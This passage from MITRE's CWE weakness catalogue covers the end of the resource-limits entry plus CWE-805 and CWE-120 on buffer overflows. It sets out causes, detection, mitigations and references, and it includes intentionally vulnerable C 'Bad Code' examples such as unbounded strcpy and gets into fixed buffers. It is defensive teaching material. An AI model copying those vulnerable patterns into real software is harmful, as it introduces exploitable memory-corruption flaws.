When the current levels get close to the maximum that is defined for the application (see CWE-770), then limit the allocation of further resources to privileged users; alternately, begin releasing resources for less-privileged users. While this mitigation may protect the system from attack, it will not necessarily stop attackers from adversely impacting other users.

Ensure that the application performs the appropriate error checks and error handling in case resources become unavailable (CWE-703).

+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfWeakness BaseWeakness Base400Uncontrolled Resource Consumption ('Resource Exhaustion')
Development Concepts (primary)699
Research Concepts1000
ChildOfWeakness ClassWeakness Class665Improper Initialization
Research Concepts (primary)1000
ChildOfCategoryCategory8022010 Top 25 - Risky Resource Management
Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors (primary)800
ChildOfCategoryCategory840Business Logic Errors
Development Concepts699
ChildOfCategoryCategory857CERT Java Secure Coding Section 12 - Input Output (FIO)
Weaknesses Addressed by the CERT Java Secure Coding Standard844
ChildOfCategoryCategory858CERT Java Secure Coding Section 13 - Serialization (SER)
Weaknesses Addressed by the CERT Java Secure Coding Standard844
ChildOfCategoryCategory861CERT Java Secure Coding Section 49 - Miscellaneous (MSC)
Weaknesses Addressed by the CERT Java Secure Coding Standard (primary)844
ChildOfCategoryCategory8672011 Top 25 - Weaknesses On the Cusp
Weaknesses in the 2011 CWE/SANS Top 25 Most Dangerous Software Errors (primary)900
ChildOfCategoryCategory876CERT C++ Secure Coding Section 08 - Memory Management (MEM)
Weaknesses Addressed by the CERT C++ Secure Coding Standard (primary)868
ChildOfCategoryCategory877CERT C++ Secure Coding Section 09 - Input Output (FIO)
Weaknesses Addressed by the CERT C++ Secure Coding Standard868
ChildOfCategoryCategory985SFP Secondary Cluster: Unrestricted Consumption
Software Fault Pattern (SFP) Clusters (primary)888
ParentOfWeakness VariantWeakness Variant774Allocation of File Descriptors or Handles Without Limits or Throttling
Research Concepts (primary)1000
ParentOfWeakness VariantWeakness Variant789Uncontrolled Memory Allocation
Development Concepts (primary)699
Research Concepts (primary)1000
MemberOfViewView884CWE Cross-section
CWE Cross-section (primary)884
+ Theoretical Notes

Vulnerability theory is largely about how behaviors and resources interact. "Resource exhaustion" can be regarded as either a consequence or an attack, depending on the perspective. This entry is an attempt to reflect one of the underlying weaknesses that enable these attacks (or consequences) to take place.

+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
CERT Java Secure CodingFIO04-JClose resources when they are no longer needed
CERT Java Secure CodingSER12-JAvoid memory and resource leaks during serialization
CERT Java Secure CodingMSC05-JDo not exhaust heap space
CERT C++ Secure CodingMEM12-CPPDo not assume infinite heap space
CERT C++ Secure CodingFIO42-CPPEnsure files are properly closed when they are no longer needed
+ References
Joao Antunes, Nuno Ferreira Neves and Paulo Verissimo. "Detection and Prediction of Resource-Exhaustion Vulnerabilities". Proceedings of the IEEE International Symposium on Software Reliability Engineering (ISSRE). November 2008. <http://homepages.di.fc.ul.pt/~nuno/PAPERS/ISSRE08.pdf>.
D.J. Bernstein. "Resource exhaustion". <http://cr.yp.to/docs/resources.html>.
Pascal Meunier. "Resource exhaustion". Secure Programming Educational Material. 2004. <http://homes.cerias.purdue.edu/~pmeunier/secprog/sanitized/class1/6.resource%20exhaustion.ppt>.
[REF-11] M. Howard and D. LeBlanc. "Writing Secure Code". Chapter 17, "Protecting Against Denial of Service Attacks" Page 517. 2nd Edition. Microsoft. 2002.
Frank Kim. "Top 25 Series - Rank 22 - Allocation of Resources Without Limits or Throttling". SANS Software Security Institute. 2010-03-23. <http://blogs.sans.org/appsecstreetfighter/2010/03/23/top-25-series-rank-22-allocation-of-resources-without-limits-or-throttling/>.
[REF-7] Mark Dowd, John McDonald and Justin Schuh. "The Art of Software Security Assessment". Chapter 10, "Resource Limits", Page 574.. 1st Edition. Addison Wesley. 2006.
+ Maintenance Notes

"Resource exhaustion" (CWE-400) is currently treated as a weakness, although it is more like a category of weaknesses that all have the same type of consequence. While this entry treats CWE-400 as a parent in view 1000, the relationship is probably more appropriately described as a chain.

+ Content History
Submissions
Submission DateSubmitterOrganizationSource
2009-05-13Internal CWE Team
Modifications
Modification DateModifierOrganizationSource
2009-07-27CWE Content TeamMITREInternal
updated Related_Attack_Patterns
2009-10-29CWE Content TeamMITREInternal
updated Relationships
2009-12-28CWE Content TeamMITREInternal
updated Applicable_Platforms, Demonstrative_Examples, Detection_Factors, Observed_Examples, References, Time_of_Introduction
2010-02-16CWE Content TeamMITREInternal
updated Common_Consequences, Detection_Factors, Potential_Mitigations, References, Related_Attack_Patterns, Relationships
2010-04-05CWE Content TeamMITREInternal
updated Common_Consequences, Demonstrative_Examples, Related_Attack_Patterns
2010-06-21CWE Content TeamMITREInternal
updated Common_Consequences, Potential_Mitigations, References
2010-09-27CWE Content TeamMITREInternal
updated Demonstrative_Examples, Potential_Mitigations
2011-03-29CWE Content TeamMITREInternal
updated Demonstrative_Examples, Detection_Factors, Relationships
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences, Relationships, Taxonomy_Mappings
2011-06-27CWE Content TeamMITREInternal
updated Relationships
2011-09-13CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
2012-05-11CWE Content TeamMITREInternal
updated Demonstrative_Examples, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings
2012-10-30CWE Content TeamMITREInternal
updated Potential_Mitigations
2014-02-18CWE Content TeamMITREInternal
updated Related_Attack_Patterns
2014-06-23CWE Content TeamMITREInternal
updated Related_Attack_Patterns
2014-07-30CWE Content TeamMITREInternal
updated Relationships
2015-12-07CWE Content TeamMITREInternal
updated Related_Attack_Patterns
2017-05-03CWE Content TeamMITREInternal
updated Related_Attack_Patterns

CWE-805: Buffer Access with Incorrect Length Value

Weakness ID: 805
Abstraction: Base
Status: Incomplete
Presentation Filter:
+ Description

Description Summary

The software uses a sequential operation to read or write a buffer, but it uses an incorrect length value that causes it to access memory that is outside of the bounds of the buffer.

Extended Description

When the length value exceeds the size of the destination, a buffer overflow could occur.

+ Time of Introduction
  • Implementation
+ Applicable Platforms

Languages

C: (Often)

C++: (Often)

Assembly

+ Common Consequences
ScopeEffect
Integrity
Confidentiality
Availability

Technical Impact: Execute unauthorized code or commands

Buffer overflows often can be used to execute arbitrary code, which is usually outside the scope of a program's implicit security policy. This can often be used to subvert any other security service.

Availability

Technical Impact: DoS: crash / exit / restart; DoS: resource consumption (CPU)

Buffer overflows generally lead to crashes. Other attacks leading to lack of availability are possible, including putting the program into an infinite loop.

+ Likelihood of Exploit

Medium to High

+ Detection Methods

Automated Static Analysis

This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives.

Automated static analysis generally does not account for environmental considerations when reporting out-of-bounds memory operations. This can make it difficult for users to determine which warnings should be investigated first. For example, an analysis tool might report buffer overflows that originate from command line arguments in a program that is not expected to run with setuid or other special privileges.

Effectiveness: High

Detection techniques for buffer-related errors are more mature than for most other weakness types.

Automated Dynamic Analysis

This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software's operation may slow down, but it should not become unstable, crash, or generate incorrect results.

Effectiveness: Moderate

Without visibility into the code, black box methods may not be able to sufficiently distinguish this weakness from others, requiring manual methods to diagnose the underlying problem.

Manual Analysis

Manual analysis can be useful for finding this weakness, but it might not achieve desired code coverage within limited time constraints. This becomes difficult for weaknesses that must be considered for all inputs, since the attack surface can be too large.

+ Demonstrative Examples

Example 1

This example takes an IP address from a user, verifies that it is well formed and then looks up the hostname and copies it into a buffer.

(Bad Code)
Example Language:
void host_lookup(char *user_supplied_addr){
struct hostent *hp;
in_addr_t *addr;
char hostname[64];
in_addr_t inet_addr(const char *cp);

/*routine that ensures user_supplied_addr is in the right format for conversion */
validate_addr_form(user_supplied_addr);
addr = inet_addr(user_supplied_addr);
hp = gethostbyaddr( addr, sizeof(struct in_addr), AF_INET);
strcpy(hostname, hp->h_name);
}

This function allocates a buffer of 64 bytes to store the hostname under the assumption that the maximum length value of hostname is 64 bytes, however there is no guarantee that the hostname will not be larger than 64 bytes. If an attacker specifies an address which resolves to a very large hostname, then we may overwrite sensitive data or even relinquish control flow to the attacker.

Note that this example also contains an unchecked return value (CWE-252) that can lead to a NULL pointer dereference (CWE-476).

Example 2

In the following example, it is possible to request that memcpy move a much larger segment of memory than assumed:

(Bad Code)
Example Language:
int returnChunkSize(void *) {
/* if chunk info is valid, return the size of usable memory,
* else, return -1 to indicate an error
*/
...
}
int main() {
...
memcpy(destBuf, srcBuf, (returnChunkSize(destBuf)-1));
...
}

If returnChunkSize() happens to encounter an error it will return -1. Notice that the return value is not checked before the memcpy operation (CWE-252), so -1 can be passed as the size argument to memcpy() (CWE-805). Because memcpy() assumes that the value is unsigned, it will be interpreted as MAXINT-1 (CWE-195), and therefore will copy far more memory than is likely available to the destination buffer (CWE-787, CWE-788).

Example 3

In the following example, the source character string is copied to the dest character string using the method strncpy.

(Bad Code)
Example Languages: C and C++ 
...
char source[21] = "the character string";
char dest[12];
strncpy(dest, source, sizeof(source)-1);
...

However, in the call to strncpy the source character string is used within the sizeof call to determine the number of characters to copy. This will create a buffer overflow as the size of the source character string is greater than the dest character string. The dest character string should be used within the sizeof call to ensure that the correct number of characters are copied, as shown below.

(Good Code)
Example Languages: C and C++ 
...
char source[21] = "the character string";
char dest[12];
strncpy(dest, source, sizeof(dest)-1);
...

Example 4

In this example, the method outputFilenameToLog outputs a filename to a log file. The method arguments include a pointer to a character string containing the file name and an integer for the number of characters in the string. The filename is copied to a buffer where the buffer size is set to a maximum size for inputs to the log file. The method then calls another method to save the contents of the buffer to the log file.

(Bad Code)
Example Languages: C and C++ 
#define LOG_INPUT_SIZE 40

// saves the file name to a log file
int outputFilenameToLog(char *filename, int length) {
int success;

// buffer with size set to maximum size for input to log file
char buf[LOG_INPUT_SIZE];

// copy filename to buffer
strncpy(buf, filename, length);

// save to log file
success = saveToLogFile(buf);

return success;
}

However, in this case the string copy method, strncpy, mistakenly uses the length method argument to determine the number of characters to copy rather than using the size of the local character string, buf. This can lead to a buffer overflow if the number of characters contained in character string pointed to by filename is larger then the number of characters allowed for the local character string. The string copy method should use the buf character string within a sizeof call to ensure that only characters up to the size of the buf array are copied to avoid a buffer overflow, as shown below.

(Good Code)
Example Languages: C and C++ 
...
// copy filename to buffer
strncpy(buf, filename, sizeof(buf)-1);
...
+ Observed Examples
ReferenceDescription
Chain: large length value causes buffer over-read (CWE-126)
Use of packet length field to make a calculation, then copy into a fixed-size buffer
Chain: retrieval of length value from an uninitialized memory location
Crafted length value in document reader leads to buffer overflow
SSL server overflow when the sum of multiple length fields exceeds a given value
Language interpreter API function doesn't validate length argument, leading to information exposure
+ Potential Mitigations

Phase: Requirements

Strategy: Language Selection

Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

For example, many languages that perform their own memory management, such as Java and Perl, are not subject to buffer overflows. Other languages, such as Ada and C#, typically provide overflow protection, but the protection can be disabled by the programmer.

Be wary that a language's interface to native code may still be subject to overflows, even if the language itself is theoretically safe.

Phase: Architecture and Design

Strategy: Libraries or Frameworks

Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

Examples include the Safe C String Library (SafeStr) by Messier and Viega [R.805.6], and the Strsafe.h library from Microsoft [R.805.7]. These libraries provide safer versions of overflow-prone string-handling functions.

This is not a complete solution, since many buffer overflows are not related to strings.

Phase: Build and Compilation

Strategy: Compilation or Build Hardening

Run or compile the software using features or extensions that automatically provide a protection mechanism that mitigates or eliminates buffer overflows.

For example, certain compilers and extensions provide automatic buffer overflow detection mechanisms that are built into the compiled code. Examples include the Microsoft Visual Studio /GS flag, Fedora/Red Hat FORTIFY_SOURCE GCC flag, StackGuard, and ProPolice.

Effectiveness: Defense in Depth

This is not necessarily a complete solution, since these mechanisms can only detect certain types of overflows. In addition, an attack could still cause a denial of service, since the typical response is to exit the application.

Phase: Implementation

Consider adhering to the following rules when allocating and managing an application's memory:

  • Double check that your buffer is as large as you specify.

  • When using functions that accept a number of bytes to copy, such as strncpy(), be aware that if the destination buffer size is equal to the source buffer size, it may not NULL-terminate the string.

  • Check buffer boundaries if accessing the buffer in a loop and make sure you are not in danger of writing past the allocated space.

  • If necessary, truncate all input strings to a reasonable length before passing them to the copy and concatenation functions.

Phase: Architecture and Design

For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

Phase: Operation

Strategy: Environment Hardening

Run or compile the software using features or extensions that randomly arrange the positions of a program's executable and libraries in memory. Because this makes the addresses unpredictable, it can prevent an attacker from reliably jumping to exploitable code.

Examples include Address Space Layout Randomization (ASLR) [R.805.2] [R.805.4] and Position-Independent Executables (PIE) [R.805.10].

Effectiveness: Defense in Depth

This is not a complete solution. However, it forces the attacker to guess an unknown value that changes every program execution. In addition, an attack could still cause a denial of service, since the typical response is to exit the application.

Phase: Operation

Strategy: Environment Hardening

Use a CPU and operating system that offers Data Execution Protection (NX) or its equivalent [R.805.3] [R.805.6].

Effectiveness: Defense in Depth

This is not a complete solution, since buffer overflows could be used to overwrite nearby variables to modify the software's state in dangerous ways. In addition, it cannot be used in cases in which self-modifying code is required. Finally, an attack could still cause a denial of service, since the typical response is to exit the application.

Phases: Architecture and Design; Operation

Strategy: Environment Hardening

Run your code using the lowest privileges that are required to accomplish the necessary tasks [R.805.9]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations.

Phases: Architecture and Design; Operation

Strategy: Sandbox or Jail

Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software.

OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations.

This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise.

Be careful to avoid CWE-243 and other weaknesses related to jails.

Effectiveness: Limited

The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed.

+ Weakness Ordinalities
OrdinalityDescription
Resultant
(where the weakness is typically related to the presence of some other weaknesses)
Primary
(where the weakness exists independent of other weaknesses)
+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfWeakness ClassWeakness Class119Improper Restriction of Operations within the Bounds of a Memory Buffer
Development Concepts (primary)699
Research Concepts (primary)1000
ChildOfCategoryCategory740CERT C Secure Coding Section 06 - Arrays (ARR)
Weaknesses Addressed by the CERT C Secure Coding Standard (primary)734
ChildOfCategoryCategory8022010 Top 25 - Risky Resource Management
Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors (primary)800
ChildOfCategoryCategory8672011 Top 25 - Weaknesses On the Cusp
Weaknesses in the 2011 CWE/SANS Top 25 Most Dangerous Software Errors (primary)900
ChildOfCategoryCategory874CERT C++ Secure Coding Section 06 - Arrays and the STL (ARR)
Weaknesses Addressed by the CERT C++ Secure Coding Standard (primary)868
ParentOfWeakness VariantWeakness Variant806Buffer Access Using Size of Source Buffer
Development Concepts (primary)699
Research Concepts (primary)1000
MemberOfViewView884CWE Cross-section
CWE Cross-section (primary)884
CanFollowWeakness BaseWeakness Base130Improper Handling of Length Parameter Inconsistency
Research Concepts1000
+ Affected Resources
  • Memory
+ Causal Nature

Explicit

+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
CERT C++ Secure CodingARR33-CPPGuarantee that copies are made into storage of sufficient size
CERT C Secure CodingARR33-CGuarantee that copies are made into storage of sufficient size
+ References
[R.805.1] [REF-11] M. Howard and D. LeBlanc. "Writing Secure Code". Chapter 6, "Why ACLs Are Important" Page 171. 2nd Edition. Microsoft. 2002.
[R.805.2] [REF-22] Michael Howard. "Address Space Layout Randomization in Windows Vista". <http://blogs.msdn.com/michael_howard/archive/2006/05/26/address-space-layout-randomization-in-windows-vista.aspx>.
[R.805.3] Arjan van de Ven. "Limiting buffer overflows with ExecShield". <http://www.redhat.com/magazine/009jul05/features/execshield/>.
[R.805.4] [REF-29] "PaX". <http://en.wikipedia.org/wiki/PaX>.
[R.805.5] Jason Lam. "Top 25 Series - Rank 12 - Buffer Access with Incorrect Length Value". SANS Software Security Institute. 2010-03-11. <http://blogs.sans.org/appsecstreetfighter/2010/03/11/top-25-series-rank-12-buffer-access-with-incorrect-length-value/>.
[R.805.6] [REF-26] Matt Messier and John Viega. "Safe C String Library v1.0.3". <http://www.zork.org/safestr/>.
[R.805.7] [REF-27] Microsoft. "Using the Strsafe.h Functions". <http://msdn.microsoft.com/en-us/library/ms647466.aspx>.
[R.805.8] [REF-25] Microsoft. "Understanding DEP as a mitigation technology part 1". <http://blogs.technet.com/b/srd/archive/2009/06/12/understanding-dep-as-a-mitigation-technology-part-1.aspx>.
[R.805.9] [REF-31] Sean Barnum and Michael Gegick. "Least Privilege". 2005-09-14. <https://buildsecurityin.us-cert.gov/daisy/bsi/articles/knowledge/principles/351.html>.
[R.805.10] [REF-37] Grant Murphy. "Position Independent Executables (PIE)". Red Hat. 2012-11-28. <https://securityblog.redhat.com/2012/11/28/position-independent-executables-pie/>.
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
2010-01-15MITREInternal CWE Team
Modifications
Modification DateModifierOrganizationSource
2010-04-05CWE Content TeamMITREInternal
updated Related_Attack_Patterns
2010-06-21CWE Content TeamMITREInternal
updated Common_Consequences, Potential_Mitigations, References
2010-09-27CWE Content TeamMITREInternal
updated Potential_Mitigations
2010-12-13CWE Content TeamMITREInternal
updated Potential_Mitigations
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences
2011-06-27CWE Content TeamMITREInternal
updated Demonstrative_Examples, Observed_Examples, Relationships
2011-09-13CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
2012-05-11CWE Content TeamMITREInternal
updated Potential_Mitigations, References, Relationships
2012-10-30CWE Content TeamMITREInternal
updated Potential_Mitigations
2014-02-18CWE Content TeamMITREInternal
updated Potential_Mitigations, References
2014-06-23CWE Content TeamMITREInternal
updated Demonstrative_Examples

CWE-120: Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')

Weakness ID: 120
Abstraction: Base
Status: Incomplete
Presentation Filter:
+ Description

Description Summary

The program copies an input buffer to an output buffer without verifying that the size of the input buffer is less than the size of the output buffer, leading to a buffer overflow.

Extended Description

A buffer overflow condition exists when a program attempts to put more data in a buffer than it can hold, or when a program attempts to put data in a memory area outside of the boundaries of a buffer. The simplest type of error, and the most common cause of buffer overflows, is the "classic" case in which the program copies the buffer without restricting how much is copied. Other variants exist, but the existence of a classic overflow strongly suggests that the programmer is not considering even the most basic of security protections.

+ Alternate Terms
buffer overrun:

Some prominent vendors and researchers use the term "buffer overrun," but most people use "buffer overflow."

Unbounded Transfer
+ Terminology Notes

Many issues that are now called "buffer overflows" are substantively different than the "classic" overflow, including entirely different bug types that rely on overflow exploit techniques, such as integer signedness errors, integer overflows, and format string bugs. This imprecise terminology can make it difficult to determine which variant is being reported.

+ Time of Introduction
  • Implementation
+ Applicable Platforms

Languages

C

C++

Assembly

+ Common Consequences
ScopeEffect
Integrity
Confidentiality
Availability

Technical Impact: Execute unauthorized code or commands

Buffer overflows often can be used to execute arbitrary code, which is usually outside the scope of a program's implicit security policy. This can often be used to subvert any other security service.

Availability

Technical Impact: DoS: crash / exit / restart; DoS: resource consumption (CPU)

Buffer overflows generally lead to crashes. Other attacks leading to lack of availability are possible, including putting the program into an infinite loop.

+ Likelihood of Exploit

High to Very High

+ Detection Methods

Automated Static Analysis

This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives.

Automated static analysis generally does not account for environmental considerations when reporting out-of-bounds memory operations. This can make it difficult for users to determine which warnings should be investigated first. For example, an analysis tool might report buffer overflows that originate from command line arguments in a program that is not expected to run with setuid or other special privileges.

Effectiveness: High

Detection techniques for buffer-related errors are more mature than for most other weakness types.

Automated Dynamic Analysis

This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software's operation may slow down, but it should not become unstable, crash, or generate incorrect results.

Manual Analysis

Manual analysis can be useful for finding this weakness, but it might not achieve desired code coverage within limited time constraints. This becomes difficult for weaknesses that must be considered for all inputs, since the attack surface can be too large.

Automated Static Analysis - Binary / Bytecode

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Bytecode Weakness Analysis - including disassembler + source code weakness analysis

  • Binary Weakness Analysis - including disassembler + source code weakness analysis

Effectiveness: SOAR High

Manual Static Analysis - Binary / Bytecode

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies

Effectiveness: SOAR Partial

Dynamic Analysis with automated results interpretation

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Web Application Scanner

  • Web Services Scanner

  • Database Scanners

Effectiveness: SOAR Partial

Dynamic Analysis with manual results interpretation

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Fuzz Tester

  • Framework-based Fuzzer

Effectiveness: SOAR Partial

Manual Static Analysis - Source Code

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Focused Manual Spotcheck - Focused manual analysis of source

  • Manual Source Code Review (not inspections)

Effectiveness: SOAR Partial

Automated Static Analysis - Source Code

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Source code Weakness Analyzer

  • Context-configured Source Code Weakness Analyzer

Effectiveness: SOAR High

Architecture / Design Review

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Formal Methods / Correct-By-Construction

Cost effective for partial coverage:

  • Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)

Effectiveness: SOAR High

+ Demonstrative Examples

Example 1

The following code asks the user to enter their last name and then attempts to store the value entered in the last_name array.

(Bad Code)
Example Language:
char last_name[20];
printf ("Enter your last name: ");
scanf ("%s", last_name);

The problem with the code above is that it does not restrict or limit the size of the name entered by the user. If the user enters "Very_very_long_last_name" which is 24 characters long, then a buffer overflow will occur since the array can only hold 20 characters total.

Example 2

The following code attempts to create a local copy of a buffer to perform some manipulations to the data.

(Bad Code)
Example Language:
void manipulate_string(char* string){
char buf[24];
strcpy(buf, string);
...
}

However, the programmer does not ensure that the size of the data pointed to by string will fit in the local buffer and blindly copies the data with the potentially dangerous strcpy() function. This may result in a buffer overflow condition if an attacker can influence the contents of the string parameter.

Example 3

The excerpt below calls the gets() function in C, which is inherently unsafe.

(Bad Code)
Example Language:
char buf[24];
printf("Please enter your name and press <Enter>\n");
gets(buf);
...
}

However, the programmer uses the function gets() which is inherently unsafe because it blindly copies all input from STDIN to the buffer without restricting how much is copied. This allows the user to provide a string that is larger than the buffer size, resulting in an overflow condition.

Example 4

In the following example, a server accepts connections from a client and processes the client request. After accepting a client connection, the program will obtain client information using the gethostbyaddr method, copy the hostname of the client that connected to a local variable and output the hostname of the client to a log file.

(Bad Code)
Example Languages: C and C++ 
...
struct hostent *clienthp;
char hostname[MAX_LEN];

// create server socket, bind to server address and listen on socket
...

// accept client connections and process requests
int count = 0;
for (count = 0; count < MAX_CONNECTIONS; count++) {

int clientlen = sizeof(struct sockaddr_in);
int clientsocket = accept(serversocket, (struct sockaddr *)&clientaddr, &clientlen);

if (clientsocket >= 0) {
clienthp = gethostbyaddr((char*) &clientaddr.sin_addr.s_addr, sizeof(clientaddr.sin_addr.s_addr), AF_INET);
strcpy(hostname, clienthp->h_name);
logOutput("Accepted client connection from host ", hostname);

// process client request
...
close(clientsocket);
}
}
close(serversocket);
...

However, the hostname of the client that connected may be longer than the allocated size for the local hostname variable. This will result in a buffer overflow when copying the client hostname to the local variable using the strcpy method.

+ Observed Examples
ReferenceDescription
buffer overflow using command with long argument
buffer overflow in local program using long environment variable
buffer overflow in comment characters, when product increments a counter for a ">" but does not decrement for "<"
By replacing a valid cookie value with an extremely long string of characters, an attacker may overflow the application's buffers.
By replacing a valid cookie value with an extremely long string of characters, an attacker may overflow the application's buffers.
+ Potential Mitigations

Phase: Requirements

Strategy: Language Selection

Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

For example, many languages that perform their own memory management, such as Java and Perl, are not subject to buffer overflows. Other languages, such as Ada and C#, typically provide overflow protection, but the protection can be disabled by the programmer.

Be wary that a language's interface to native code may still be subject to overflows, even if the language itself is theoretically safe.

Phase: Architecture and Design

Strategy: Libraries or Frameworks

Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

Examples include the Safe C String Library (SafeStr) by Messier and Viega [R.120.4], and the Strsafe.h library from Microsoft [R.120.3]. These libraries provide safer versions of overflow-prone string-handling functions.

This is not a complete solution, since many buffer overflows are not related to strings.

Phase: Build and Compilation

Strategy: Compilation or Build Hardening

Run or compile the software using features or extensions that automatically provide a protection mechanism that mitigates or eliminates buffer overflows.

For example, certain compilers and extensions provide automatic buffer overflow detection mechanisms that are built into the compiled code. Examples include the Microsoft Visual Studio /GS flag, Fedora/Red Hat FORTIFY_SOURCE GCC flag, StackGuard, and ProPolice.

Effectiveness: Defense in Depth

This is not necessarily a complete solution, since these mechanisms can only detect certain types of overflows. In addition, an attack could still cause a denial of service, since the typical response is to exit the application.

Phase: Implementation

Consider adhering to the following rules when allocating and managing an application's memory:

  • Double check that your buffer is as large as you specify.

  • When using functions that accept a number of bytes to copy, such as strncpy(), be aware that if the destination buffer size is equal to the source buffer size, it may not NULL-terminate the string.

  • Check buffer boundaries if accessing the buffer in a loop and make sure you are not in danger of writing past the allocated space.

  • If necessary, truncate all input strings to a reasonable length before passing them to the copy and concatenation functions.

Phase: Implementation

Strategy: Input Validation

Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a whitelist of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.

When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."

Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a blacklist). A blacklist is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, blacklists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.

Phase: Architecture and Design

For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

Phase: Operation

Strategy: Environment Hardening

Run or compile the software using features or extensions that randomly arrange the positions of a program's executable and libraries in memory. Because this makes the addresses unpredictable, it can prevent an attacker from reliably jumping to exploitable code.

Examples include Address Space Layout Randomization (ASLR) [R.120.5] [R.120.7] and Position-Independent Executables (PIE) [R.120.14].

Effectiveness: Defense in Depth

This is not a complete solution. However, it forces the attacker to guess an unknown value that changes every program execution. In addition, an attack could still cause a denial of service, since the typical response is to exit the application.

Phase: Operation

Strategy: Environment Hardening

Use a CPU and operating system that offers Data Execution Protection (NX) or its equivalent [R.120.7] [R.120.9].

Effectiveness: Defense in Depth

This is not a complete solution, since buffer overflows could be used to overwrite nearby variables to modify the software's state in dangerous ways. In addition, it cannot be used in cases in which self-modifying code is required. Finally, an attack could still cause a denial of service, since the typical response is to exit the application.

Phases: Build and Compilation; Operation

Most mitigating technologies at the compiler or OS level to date address only a subset of buffer overflow problems and rarely provide complete protection against even that subset. It is good practice to implement strategies to increase the workload of an attacker, such as leaving the attacker to guess an unknown value that changes every program execution.

Phase: Implementation

Replace unbounded copy functions with analogous functions that support length arguments, such as strcpy with strncpy. Create these if they are not available.

Effectiveness: Moderate

This approach is still susceptible to calculation errors, including issues such as off-by-one errors (CWE-193) and incorrectly calculating buffer lengths (CWE-131).

Phase: Architecture and Design

Strategy: Enforcement by Conversion

When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.

Phases: Architecture and Design; Operation

Strategy: Environment Hardening

Run your code using the lowest privileges that are required to accomplish the necessary tasks [R.120.10]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations.

Phases: Architecture and Design; Operation

Strategy: Sandbox or Jail

Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software.

OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations.

This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise.

Be careful to avoid CWE-243 and other weaknesses related to jails.

Effectiveness: Limited

The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed.

+ Weakness Ordinalities
OrdinalityDescription
Resultant
(where the weakness is typically related to the presence of some other weaknesses)
Primary
(where the weakness exists independent of other weaknesses)
+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfWeakness ClassWeakness Class20Improper Input Validation
